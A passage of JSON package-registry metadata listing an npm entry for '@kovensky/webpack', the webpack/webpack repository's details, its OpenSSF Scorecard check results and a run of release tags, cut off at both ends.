ta":{"funded_packages_count":70969,"sync_missing_packages_cursor":{"timestamp":"2026-08-17T00:00:58.969562Z","path":"github.com/Tektoncd/operator","version":"v0.78.0"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-09-02T05:03:03.375Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":1022974,"name":"@kovensky/webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"kovensky","versions_count":1,"first_release_published_at":"2016-04-06T08:42:23.380Z","latest_release_published_at":"2016-04-06T08:42:23.380Z","latest_release_number":"2.1.0-beta.4.1","last_synced_at":"2026-09-03T00:16:52.310Z","created_at":"2022-04-07T19:29:46.896Z","updated_at":"2026-09-03T00:16:52.310Z","registry_url":"https://www.npmjs.com/package/@kovensky/webpack","install_command":"npm install @kovensky/webpack","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"2.1.0-beta.4.1"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.e